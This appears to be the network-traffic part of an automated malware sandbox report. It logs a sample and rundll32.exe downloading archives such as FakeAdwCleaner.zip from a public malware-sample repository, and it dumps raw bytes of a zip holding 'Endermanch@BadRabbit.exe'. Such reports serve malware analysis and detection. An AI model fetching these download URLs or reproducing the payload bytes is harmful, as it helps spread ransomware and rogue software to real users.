                                                                                                                                                    2022-09-29 12:59:07 UTC11824INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:11 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:07 UTC11825INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    79192.168.2.349747185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:07 UTC11826OUTGET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    8185.199.108.133443192.168.2.349711C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:48 UTC192INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 402632
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "004f09a50a54351833511d1b99db3436b26a72d8e149d6c13dd20a27fe83f3a9"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 5618:1220:101AF1B:11175EB:63359687
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:48 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6961-MXP
                                                                                                                                                    X-Cache: MISS
                                                                                                                                                    X-Cache-Hits: 0
                                                                                                                                                    X-Timer: S1664456328.906727,VS0,VE181
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 188124f95143aee3ab9b10b1109dd297a6aad058
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:03:48 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:58:48 UTC192INData Raw: 50 4b 03 04 14 00 01 00 08 00 81 a9 58 4b a5 c9 a1 5f 12 24 06 00 2b be 06 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 61 64 52 61 62 62 69 74 2e 65 78 65 01 be e1 49 53 97 20 1c fa c3 6c 18 29 d1 f4 f7 b9 c1 0f c2 9d 6d e2 a3 7f 5f 80 37 a1 bf 46 53 1e 79 43 c5 68 f0 2d 6f a5 6c bc 0b d3 34 e8 37 46 4f 1d 09 b7 a5 d6 3f 8f 58 ab 3e 2a 6b e8 1c 51 80 2f 2b 06 5f 55 e5 78 40 db b9 ba f4 53 46 d8 d7 32 07 89 19 21 37 5e 46 a7 76 3d 2e 65 bc d2 d4 da f9 17 a2 91 f7 2a 17 53 56 14 07 fc 80 61 6e be 20 45 b9 a6 61 66 fa 0e e1 ab 52 4b 8f 7a 5f 56 4d 81 a4 45 ec fb 8c c3 9b b1 0c 2c 9f ac be 4e 92 81 00 98 1f 9a 78 44 7b 7e 07 bf be 1f 74 1e c3 72 cc ca b4 be 8c f1 ec 6f e7 14 34 c2 be ff d4 80 dc 69 5f 70 f5 e0 9e cf 53 02 80 3a 32 88 09 e4 9a 07 df 28
                                                                                                                                                    Data Ascii: PKXK_$+Endermanch@BadRabbit.exeIS l)m_7FSyCh-ol47FO?X>*kQ/+_Ux@SF2!7^Fv=.e*SVan EafRKz_VME,NxD{~tro4i_pS:2(
                                                                                                                                                    2022-09-29 12:58:48 UTC194INData Raw: 34 32 65 b6 94 d6 82 b7 43 9e 4a 02 54 b5 35 79 77 8c f9 07 93 82 0a ea 8d ad c0 11 a4 0f c9 18 4d 97 d4 2b 21 fd 14 21 23 bb c3 75 54 09 b7 42 ea 85 01 a0 3e 79 a2 2a 6c 74 b8 19 55 58 7c 91 1c 9a 4b 1f bf c4 2c 5b 94 30 25 67 ea 17 e7 9e b7 9e 75 c0 e0 37 ec f1 7d 83 c9 2a 70 84 d9 f2 17 cd 1b 65 77 e8 15 a9 d6 30 27 03 62 99 43 e8 af e6 f3 37 3b bf 96 93 3e 56 12 2d ad 6a 24 17 4a 24 21 8c 72 90 22 84 ea 46 f9 7f d3 a4 2d 8a 96 aa f4 3b 8b d5 b9 52 93 63 91 ac 36 dd 22 be 4c bd 29 5a d5 f9 9c f2 54 df 96 38 c2 7a 8a a0 2a 54 3e bb 6b 33 fd d0 1a 52 f0 28 20 be 11 ea bd 23 a1 52 46 63 49 47 4c 46 fb 28 cd 1b 46 87 0a c7 dc 90 a8 f1 9d 8a b3 06 02 f8 29 7d 38 1a 36 15 ca 59 e4 4e aa 01 82 e1 63 5c 45 df 81 8e 9c d7 9b bd 14 cf e2 17 1d 97 e1 9b 99 0a c9
                                                                                                                                                    Data Ascii: 42eCJT5ywM+!!#uTB>y*ltUX|K,[0%gu7}*pew0'bC7;>V-j$J$!r"F-;Rc6"L)ZT8z*T>k3R( #RFcIGLF(F)}86YNc\E
                                                                                                                                                    2022-09-29 12:58:48 UTC195INData Raw: 0b 4e ef f3 6f de 93 7d a5 05 18 9d 45 49 ba f1 95 0a fe e5 1d 2c 3d 8d 9f b6 af 61 be ce 82 20 42 80 de 04 34 af 26 76 84 d9 b0 cd f2 ef 7d dc a0 96 8b e3 64 a3 16 dc d4 c2 dc e9 ab b5 55 06 32 cb 4f f0 b4 5e 63 02 ef 09 6a 9e 96 33 60 33 fe 8c 2a bc 38 61 c9 78 94 53 07 08 47 c4 fa e8 e7 33 bb dd 26 2e f2 f0 de ea d4 a8 f2 f4 b0 0e ed 58 b1 cb a3 dd 1c 2f 51 36 d5 9a db 7a bf 9c 05 95 0a d7 98 b5 6d 98 39 11 bc 35 fb 73 2a 8b 65 75 c1 c8 3a 5d f9 e7 53 79 08 72 37 05 31 50 43 96 46 b9 84 fb 94 4c cb 59 bc ad a5 4d a9 d2 ff fe c9 5c b4 de 43 1f c9 8b 9b d6 95 3a eb f1 c6 ea 6c 5f 18 ee 12 3d 01 e2 ec f1 db ca 1b 3d 5e b4 9e c5 a5 b2 0e 85 46 13 d9 7a 88 59 bd 6d cc fd 87 63 e7 b7 26 93 d5 62 61 25 0e 88 c4 97 f9 43 93 cb 88 94 d0 ad 67 9c 3c 40 b5 cc 8c
                                                                                                                                                    Data Ascii: No}EI,=a B4&v}dU2O^cj3`3*8axSG3&.X/Q6zm95s*eu:]Syr71PCFLYM\C:l_==^FzYmc&ba%Cg<@
                                                                                                                                                    2022-09-29 12:58:48 UTC196INData Raw: 8c 37 76 69 b4 a5 3e 45 27 e1 53 fb 7b 37 7b bc 8c 6b ab 81 72 b2 d9 c2 3e ea 9f 06 6d cb 02 98 fd c5 2f e6 6b 2c 3e 04 fd 0e a2 13 dc 90 47 67 94 9a 05 6a e2 72 51 6f 79 20 c0 af 9c b6 cd 7e 06 8b 75 f7 f4 5f 72 0e ce b1 55 7e ef e3 99 00 cd d7 da 5d fa 58 4d 5f 79 5b 28 fc 62 1c ae 59 81 43 d0 34 f7 eb e8 eb 32 6c 5e 27 c4 1c ec 02 9c 5d 5a 10 ac c5 8b e3 c2 79 46 de 52 af 04 f8 55 49 89 7e 4b 54 68 e0 6c b3 ac e5 2f c5 fd e2 ec 8d 51 c6 27 e4 30 fe cf 43 87 d9 ac c5 af da 94 77 e6 02 27 5c 83 72 37 b1 af a6 c4 fc 2b 13 dd 23 6b 9a 8d e2 a7 35 9c e2 05 29 79 32 af ba c8 bb b3 8c 60 1f 67 0c 24 c1 75 78 c6 4b 6e 11 4d ab 81 20 38 bd 91 9a fe c7 b9 bb 4a e2 be f0 aa 04 46 61 a9 e8 71 b6 b1 20 b9 a9 3c f3 51 26 1b 5c b0 ee 94 ff 86 61 b9 1d 6c 1b 50 cb 6f
                                                                                                                                                    Data Ascii: 7vi>E'S{7{kr>m/k,>GgjrQoy ~u_rU~]XM_y[(bYC42l^']ZyFRUI~KThl/Q'0Cw'\r7+#k5)y2`g$uxKnM 8JFaq <Q&\alPo
                                                                                                                                                    2022-09-29 12:58:48 UTC198INData Raw: c1 16 b7 77 97 48 37 28 7a 7b d4 b9 6c c7 17 29 0c 64 76 e8 86 67 1b f2 0e 51 87 a1 b3 07 5a 7b d8 66 cf f5 9a 3c ee 5e 88 07 bf ab 11 17 56 af 41 fa cb e8 fd d3 67 2f 42 83 dc 48 c4 a3 e7 22 d8 94 07 a7 7b 82 18 9e a6 f4 9c 28 2e f6 c1 7b b4 4c 21 da 36 7e 55 de 0b bd 81 0f 22 ad b2 fb 83 1b 3d 13 18 e1 f4 93 25 51 71 61 38 cc 76 6f d4 02 e5 75 59 61 b9 0f cb 08 d6 b9 c4 a5 69 83 80 51 fe b9 dd 2e 06 b5 3b af 1e be 76 e4 e6 ca df 7f 59 5f d4 ea 9d 7a cc d7 40 c8 65 73 e6 62 c8 7a 26 98 7d 22 ec 19 8f e2 bb cb d6 2c c7 69 66 a8 dd eb 4a 81 8f 13 8a ce 05 37 02 a4 27 de a9 3f 24 41 39 93 f5 e8 aa b0 82 82 e3 4d 39 23 54 01 a3 b8 14 ee 64 b4 47 fa 13 fc 5d da e7 b7 59 0e 5b 26 9c fd 12 0d 9c 49 08 f2 f6 5d 75 96 da 33 49 c4 58 47 e6 a7 92 96 08 4e 79 4e 04
                                                                                                                                                    Data Ascii: wH7(z{l)dvgQZ{f<^VAg/BH"{(.{L!6~U"=%Qqa8vouYaiQ.;vY_z@esbz&}",ifJ7'?$A9M9#TdG]Y[&I]u3IXGNyN
                                                                                                                                                    2022-09-29 12:58:48 UTC199INData Raw: 8b 07 5d 36 1d d5 87 3c 81 4d 8c 76 b4 d1 e6 fe aa 29 36 9b 5f 71 06 5c 95 d2 f1 29 d5 a3 57 eb cd 49 62 2b c8 bb 99 6f 11 f6 1c d8 c2 f0 5c 92 d4 79 70 43 ec 43 f1 1d 25 95 ee bc d8 d1 d0 62 34 d8 f3 03 91 a1 a8 28 43 dc aa 4c f2 88 9b cd ab fc c0 14 11 24 fd 32 33 f8 01 63 62 4b c1 dd ce 23 a7 84 9e 2c 6f db 41 43 cd 7c f5 43 9a 2b 49 29 72 df 5e 61 23 ca ab a6 04 f7 ab e5 2c fc 65 95 dd 78 ec 7d 25 c0 7e d4 16 50 79 3f 70 20 fb 66 92 72 95 ed 50 93 11 14 d8 c7 a0 ba 34 f0 38 2d 7a 5c d3 55 05 a5 74 f0 73 2a 08 1d 18 8c 8c 56 8d 98 41 a0 e8 9a 20 e9 f0 4b 34 3d d5 77 6a d2 95 7b 93 f8 37 46 5c a9 87 78 7c f1 64 9c d9 0e c3 c1 27 43 27 63 16 f1 03 bd e9 4b 17 69 56 12 9b 05 70 e8 62 80 66 23 f1 a1 7f d6 85 92 1c b5 d5 42 03 aa 02 96 41 16 3b e2 bd 96 fc
                                                                                                                                                    Data Ascii: ]6<Mv)6_q\)WIb+o\ypCC%b4(CL$23cbK#,oAC|C+I)r^a#,ex}%~Py?p frP48-z\Uts*VA K4=wj{7F\x|d'C'cKiVpbf#BA;
                                                                                                                                                    2022-09-29 12:58:48 UTC200INData Raw: 7b 7a 68 e8 33 12 2c 15 40 2c 54 ec 79 9a 52 b7 2f d4 85 2e cc eb 09 9d 4a 52 ff d8 d3 3b c7 ed 0a f3 20 cd 8b a1 b2 65 0d dc dd fb 1a fc bd db 77 35 8c 9b b7 1d c2 13 15 9f 96 1b ea d9 09 de 75 fc d2 50 94 7c 83 52 c4 12 c2 80 bd 30 89 79 fb c8 f6 ca 6f 50 dc ae a5 ae 1b 07 7c 12 e7 e8 9b e9 ef d9 88 12 bb a0 b9 91 82 d0 60 5a ae 0d 7e 28 dd d8 f9 4d 97 ce f3 d6 e4 04 29 53 09 03 b7 54 8b e2 67 09 26 e3 17 06 e5 10 7b 2a 21 9a 55 02 a4 7a 30 f6 f7 c6 c7 42 18 58 78 cd 4d 47 fe 5d 88 7e 04 6c 1a 05 2b 5d 70 e1 b9 56 93 28 5e 28 c5 34 76 58 a9 87 31 02 51 53 c7 e9 e0 db b8 86 73 73 9b 36 86 ff 87 d7 3a 57 d3 73 e6 81 c4 5e 1c 19 3f 0b 6f 2b 36 ab 96 c5 de 84 40 0d 4e 68 68 a9 40 e4 a9 97 75 14 83 79 d2 31 a0 5d c4 67 ec 46 84 b5 d6 ac 45 92 08 ea 0e 0f 66
                                                                                                                                                    Data Ascii: {zh3,@,TyR/.JR; ew5uP|R0yoP|`Z~(M)STg&{*!Uz0BXxMG]~l+]pV(^(4vX1QSss6:Ws^?o+6@Nhh@uy1]gFEf
                                                                                                                                                    2022-09-29 12:58:48 UTC202INData Raw: d0 2c 20 15 74 1f 26 b4 1e f0 69 f8 78 26 ad 42 87 4a 0f ad a9 6d b7 ab 50 c7 e4 11 d0 9f 9f 2d ce a4 97 74 b5 da a8 61 76 ab 27 1a 8a a6 d2 ea 68 d7 15 97 a7 d7 40 62 60 3d 07 a8 9a 34 4b a8 69 4c 45 2f 50 7c 98 e6 c0 b4 0b 56 00 d5 4b 0f 18 5b 92 27 38 31 31 ea 43 9e 9a 9a 29 88 9c cb 7e 87 5d 79 36 8c 96 7c c3 1c eb 26 13 a1 76 e9 87 f7 ca f1 58 46 22 94 f3 ad bd 29 87 93 af 16 6d 45 67 f5 fb b3 f0 47 28 70 e4 df 8f dd f1 1d 3c b4 77 8c f5 d5 82 8f 16 99 d8 d5 a6 1a 8b 00 23 84 50 66 c9 62 8b a1 7e 7c 6a 3f 8f 12 8c ed ce ab c4 5d b9 30 b4 e7 9e 38 1b 2a 01 b7 47 c9 a4 20 7f b2 be 91 d1 ad 5a ce ac e5 9c 4f c3 15 f7 66 dd 01 95 5e a0 d9 36 11 38 e1 5f 4b cd 59 16 41 e2 71 6a 4e 5f 25 14 75 50 d1 30 bc d5 2b 3f 10 75 c7 4b 21 70 eb 53 b0 21 fa e6 46 b9
                                                                                                                                                    Data Ascii: , t&ix&BJmP-tav'h@b`=4KiLE/P|VK['811C)~]y6|&vXF")mEgG(p<w#Pfb~|j?]08*G ZOf^68_KYAqjN_%uP0+?uK!pS!F
                                                                                                                                                    2022-09-29 12:58:48 UTC203INData Raw: 38 23 b6 e1 9c b9 61 ba 53 89 fe 4d 8b c1 de 1d 7f c9 0f 04 9c 2c 7d 8d c7 18 a4 bd dc a5 be 45 62 9c f5 4f 28 6f 3c ff 87 3f 4b 87 45 de 4f 8f 1d fe bd 02 a8 12 63 0d e0 58 c7 43 ca a3 e0 46 16 d6 45 1b ab a7 94 ec e6 76 0f da 15 da 0a b4 f9 fb 2f 8a 85 c0 19 28 46 b3 52 30 21 5c 87 79 34 e7 9a d7 74 59 c8 02 66 7c 43 ad cb 7a 18 6d 67 30 3f 78 3b 58 71 30 e0 7f ff 9d 23 69 00 f1 39 47 e3 88 15 95 50 6f a7 0e 04 63 36 0b eb 22 60 ee f4 5a a2 f1 df b8 3a b1 ae 8b 96 98 2d af d1 d7 2e 1c 30 b1 26 8b 3f ee d5 0b cb f2 4f ff 60 e4 15 14 ae c1 9b b0 fa b1 05 63 74 df d1 03 9e 22 35 29 92 ae 26 48 49 2c 76 87 bc ab e5 18 c0 d1 dd c2 3a 96 6b 3b 7c a8 aa 8a cc e9 6d ce 54 fe 1d dc cf 6e 08 3a a6 b3 d0 1c 3c 21 ba 23 ca 81 e8 c9 f6 17 d3 4a 9f b4 5f 70 86 39 c8
                                                                                                                                                    Data Ascii: 8#aSM,}EbO(o<?KEOcXCFEv/(FR0!\y4tYf|Czmg0?x;Xq0#i9GPoc6"`Z:-.0&?O`ct"5)&HI,v:k;|mTn:<!#J_p9
                                                                                                                                                    2022-09-29 12:58:48 UTC204INData Raw: 3d 0d 53 dd 1d dc 12 35 25 bc 25 53 c5 74 6f ac 4f 14 b9 e3 67 de da e3 c8 0a e4 83 0e 06 23 ed 40 0c bb fd 86 92 fe b8 df e6 5a 41 34 9c 2d f2 d2 0b ae a2 85 51 dd 6d 90 f6 2c 8f 9a 0f 04 eb cd 23 1f 97 f5 f1 4e 0f 63 45 4e f3 72 a5 0c 3f 7c 9c d7 5c d2 55 cf 97 5b 77 82 4b 04 60 62 28 62 87 1f ff e8 cb 2e 58 06 7a a1 5a 77 37 f0 68 6d 8b c6 41 3b b9 f0 da e9 7b 5e 5b da 76 28 69 bf b4 b9 a3 da 65 56 41 23 70 f8 05 4b b2 f4 42 18 3d 6f 74 a3 02 82 6c 84 bd 42 30 18 aa 6c 50 ff c3 23 a9 ad cd 50 b9 8b a7 b2 40 b3 c7 49 ee 17 0c e5 ef 59 3c 42 e1 28 23 68 f9 47 48 37 be 08 40 c3 7c 2a 87 a4 04 4b 71 9e 79 0b d8 a9 a9 1f 2f 56 d6 46 56 9f 6f aa 8e d0 ce 4b 1a dd 4c e9 6f 10 49 d7 bd ae 53 d5 70 94 f2 06 00 be 74 78 71 8d 4f 0b 5c 29 cb 33 94 14 e7 c7 b3 62
                                                                                                                                                    Data Ascii: =S5%%StoOg#@ZA4-Qm,#NcENr?|\U[wK`b(b.XzZw7hmA;{^[v(ieVA#pKB=otlB0lP#P@IY<B(#hGH7@|*Kqy/VFVoKLoISptxqO\)3b
                                                                                                                                                    2022-09-29 12:58:48 UTC206INData Raw: 9a 4b ac 49 ab e2 1c 36 bb 0b e4 6e a6 23 ec 6c 14 5d 30 68 e1 d2 47 84 02 c0 39 aa dd 08 5e 3e 4b 4b 33 83 fa c1 c1 2c f5 98 d1 49 9e a7 97 91 53 62 32 af fb 6b b9 9a 99 d2 f9 8d 6e d1 9e 67 80 8b ce 7b d9 87 b8 c3 25 f9 99 a3 1a dd 4a da 04 d8 20 03 76 86 48 a1 8c bc cf ad 78 f5 c9 ca 93 a6 8a 77 25 9f 01 e3 40 24 b7 08 8e 30 68 e9 dd 84 fc 30 8a 67 b5 61 3f f6 e1 bf 21 48 0e 5e 0c 33 9d 54 17 d7 b1 25 27 29 32 38 10 3d 9f 6d 35 5d 30 d0 f6 0b 6d 1f 59 11 e5 69 03 ab c9 bb b9 cb 0f 45 0f 84 e6 35 3e 38 9b 49 d5 8f b3 76 81 39 ad 13 14 8d 84 f1 7e 49 c7 e0 34 01 4e 02 96 32 a8 30 26 53 3b d3 83 9f 5e c4 cc 5f 98 3a 3e 1e 22 2b 91 30 82 7a b6 8a 93 d5 3b 41 92 ed 16 0d ff e6 51 d3 dd 0f 3c 8b 14 86 6f 6e 28 41 a1 37 11 1d e0 8b 44 30 93 44 c5 82 3a 99 b7
                                                                                                                                                    Data Ascii: KI6n#l]0hG9^>KK3,ISb2kng{%J vHxw%@$0h0ga?!H^3T%')28=m5]0mYiE5>8Iv9~I4N20&S;^_:>"+0z;AQ<on(A7D0D:
                                                                                                                                                    2022-09-29 12:58:48 UTC207INData Raw: ac 9c 8c 93 a9 2a c3 a4 30 fb 7f 88 81 83 37 66 5a c5 3a a1 59 e9 3d 3e 2d ea 91 8e ad 73 f6 ea 0c 61 50 8a 93 85 f5 57 fe 6d 84 af f0 af 77 f1 45 ec 3d 56 9e c1 72 4b 48 14 8b a4 39 8e 3d c4 ed 55 17 a3 c5 f2 00 3f 1c 21 9d 0c bd f3 4f bc 74 1c 22 7c 16 15 30 95 0a 4c f7 fa 91 9c ed a8 8b 10 b9 d8 ba f1 ba 67 fb 7c 5a b9 16 3f 5e 79 68 0f 3f 66 3e e6 02 37 d7 90 1e 51 3f cf 16 e3 f8 6c 3c 9f 1c ff 46 10 16 ef de 78 cf 1c b7 1a 3e 85 39 84 ea a6 36 ca 78 5c 33 42 a3 9b 60 b4 5f fd 1b 5e 42 1a 60 24 6f 54 41 6b ea a3 ef 63 7f 05 94 85 cc 3a 1d 75 a1 34 16 57 a5 dc d9 46 7b a5 b2 e2 4c db e3 07 19 cd e7 c7 6c 3e dd a2 29 89 de 79 d4 c8 a5 13 42 a4 fe e6 9a d0 d0 0c d1 16 9a 2c 61 45 49 d3 7a a0 0c 4e c5 3f fd 14 6f 37 49 fa bf 8e 6b 79 38 3b 60 aa d2 c3 55
                                                                                                                                                    Data Ascii: *07fZ:Y=>-saPWmwE=VrKH9=U?!Ot"|0Lg|Z?^yh?f>7Q?l<Fx>96x\3B`_^B`$oTAkc:u4WF{Ll>)yB,aEIzN?o7Iky8;`U
                                                                                                                                                    2022-09-29 12:58:48 UTC208INData Raw: 7a 08 57 09 89 3b 60 2f da 39 06 cc 7c 81 d8 a0 d4 b0 f0 13 a4 5e 5f 3d b2 31 1e f7 44 d5 ca 34 94 53 1d 74 b1 05 98 b5 1f a2 3c 71 c7 63 2d b3 cd 20 54 b3 f5 31 04 10 b3 6a d4 fd 5a e2 b4 8f 99 53 84 17 b9 17 94 68 c1 a0 a5 7a 9e a0 d2 ac ed 0d 0b 53 18 bd e7 3e 04 29 2f 6f ad 81 39 02 e2 fe b7 da 24 92 2f db b5 6c 27 f2 d8 61 76 12 c7 09 b5 8f fb e1 26 4a ad 5a 7d bb 1f ed eb a3 06 0d 31 4f 45 c2 a6 46 b3 b8 82 09 4d 90 43 76 f7 64 7a e0 b0 2f 35 9e 39 bd 9e 38 c8 e4 fc 17 68 62 2b 05 ae 8e d6 55 60 f3 41 26 ab 7c 39 ca 53 eb bb 59 4d 6f 68 f7 66 a5 0b 31 e2 9a 59 f7 d1 b6 3e 4d 9c a2 2c dd 28 ea 68 2c 62 32 80 32 17 3a 2e 9e 71 d5 8f 75 8a 0a 8d 2d 38 0c 4e 11 b6 20 c4 51 56 42 c4 02 ce 48 eb a5 75 01 0a 05 22 ce 17 e0 bc 1c a9 31 85 59 44 4a df 46 b8
                                                                                                                                                    Data Ascii: zW;`/9|^_=1D4St<qc- T1jZShzS>)/o9$/l'av&JZ}1OEFMCvdz/598hb+U`A&|9SYMohf1Y>M,(h,b22:.qu-8N QVBHu"1YDJF
                                                                                                                                                    2022-09-29 12:58:48 UTC224INData Raw: d8 a2 3a 2f bf c2 a3 8b 73 33 8d d1 5c bf b8 bf 30 eb 9e 89 a6 0a c9 5c a1 61 a8 37 dc d3 d3 73 29 a7 d8 09 01 2e 5c 25 cc e4 6c 6d a9 16 7e 50 07 f9 e6 d5 a3 68 cd 85 c8 29 dd 7d 46 ea 36 fb 71 fb d5 17 84 4a 13 9e 75 dc 24 22 93 96 d1 a3 41 33 95 3c d4 53 45 bf d2 36 69 79 b1 f8 b2 92 41 e6 80 9c 6f 1b 63 cc 39 07 af bb a5 ac cf 17 53 b8 50 da 6c d0 22 79 ad 16 ad 5d 6b c1 b8 ba c5 ee 0f 1e 12 00 74 8b f3 ac 63 dc 91 d9 56 48 7d 19 79 6b c8 8c 39 ad 3d 9d 75 f9 01 24 ca 39 f5 02 85 1a de 66 e0 31 9a 81 28 c9 6f 83 c2 6e fc 59 b0 8c 46 18 1c 3f bd b8 41 08 14 76 41 18 83 1c 8c c6 50 37 29 01 ec 92 de b4 87 07 6f f3 b8 1b 1d 05 81 b7 5e 21 58 5b 5c fb 6b 36 b5 0d 95 42 fb 6a 1f 6e d0 53 9f ee 1c 20 c5 e7 77 71 e1 90 26 ad aa ed 45 59 c2 34 bc 32 c3 58 22
                                                                                                                                                    Data Ascii: :/s3\0\a7s).\%lm~Ph)}F6qJu$"A3<SE6iyAoc9SPl"y]ktcVH}yk9=u$9f1(onYF?AvAP7)o^!X[\k6BjnS wq&EY42X"
                                                                                                                                                    2022-09-29 12:58:48 UTC240INData Raw: 7f 17 3f c2 33 9c a4 f5 61 71 9b f0 a3 66 76 29 03 59 ec d7 60 47 f5 f9 d9 76 2e a8 01 fe 24 41 ca 6c 0b 96 45 47 df 38 80 47 2b 0b c9 ee 59 1b 47 8f c9 0a fa 46 e5 c2 31 ca b5 01 a7 27 0f 3a 46 79 d6 9f d9 9a 85 3a 3f 84 08 cf b5 bd 35 c3 13 1a 98 00 d0 8e e1 71 43 9b f7 59 8d f4 57 27 79 27 9b d0 1b 46 f8 a7 8d cc 97 1e ac 36 89 10 3f c4 6a 1f a6 82 8e c2 18 ea 2f 30 df b9 73 03 06 e8 76 74 54 a1 c2 56 58 fb ca 02 70 1b a4 8a 9b fc 4e 81 cb 7f e4 49 55 d7 ca 43 b1 78 63 b5 d0 42 d4 4c 1c 76 aa d5 b7 db 50 7b b7 98 45 7c ee f4 e8 53 6e 2a f9 c3 13 dc 2d d6 aa f8 f0 51 b5 53 73 e5 8e 7c 56 64 69 a9 cf 96 ed 4c bb f8 e5 0e f1 a3 a0 c9 60 31 fb 15 ee d6 80 6f d6 54 20 12 63 df 17 14 5f 7c 46 c9 6e 48 f3 5a 90 38 39 ac 45 52 a9 67 b8 43 a2 78 96 b6 5c bc 63
                                                                                                                                                    Data Ascii: ?3aqfv)Y`Gv.$AlEG8G+YGF1':Fy:?5qCYW'y'F6?j/0svtTVXpNIUCxcBLvP{E|Sn*-QSs|VdiL`1oT c_|FnHZ89ERgCx\c
                                                                                                                                                    2022-09-29 12:58:48 UTC256INData Raw: c8 85 fc a4 ac f1 3c 8d 2d 70 20 41 b3 3a d5 bb 30 04 e0 cc 85 c1 6a ae bf 8a 7b a3 28 e7 ea ed dc c8 24 ee 73 45 42 d9 47 37 27 fb 49 cc fe 97 38 f4 33 fe a5 73 7c e8 9e c2 b5 73 95 30 85 18 39 dc f1 02 08 7d eb 76 75 95 35 c9 53 f0 3a 88 b3 63 f7 52 cc 3a d8 02 39 c6 e3 fb ce 21 c5 53 ff ae 48 48 bf 9e 8b bf 96 63 07 ad 8c 90 fd 6c 4f e6 06 7e 27 75 26 96 81 ec d9 08 30 e9 e1 b7 cd 43 c7 c6 e1 63 c1 01 46 6f 75 8b 82 43 1f b2 6d 6e ad 0f 72 0f f5 84 63 7b 29 1d bb a5 7f 9b 31 bd 78 fa 88 66 5a ca 2f 5f fb 3b 79 0c b3 21 2b d2 4f ef 53 52 79 27 58 ab e6 8d de 84 0b c2 40 19 04 20 83 87 d5 bb 39 56 6b 89 f0 9d 4a 1e 36 f9 8b 4c 09 b2 b4 b1 b7 11 c8 09 8c fb 1c fe 29 91 52 83 d4 61 0b 52 54 02 ff ed 1f 95 1d 2f 99 fb 30 24 45 1d fd 1b 79 f1 41 71 c5 25 7a
                                                                                                                                                    Data Ascii: <-p A:0j{($sEBG7'I83s|s09}vu5S:cR:9!SHHclO~'u&0CcFouCmnrc{)1xfZ/_;y!+OSRy'X@ 9VkJ6L)RaRT/0$EyAq%z
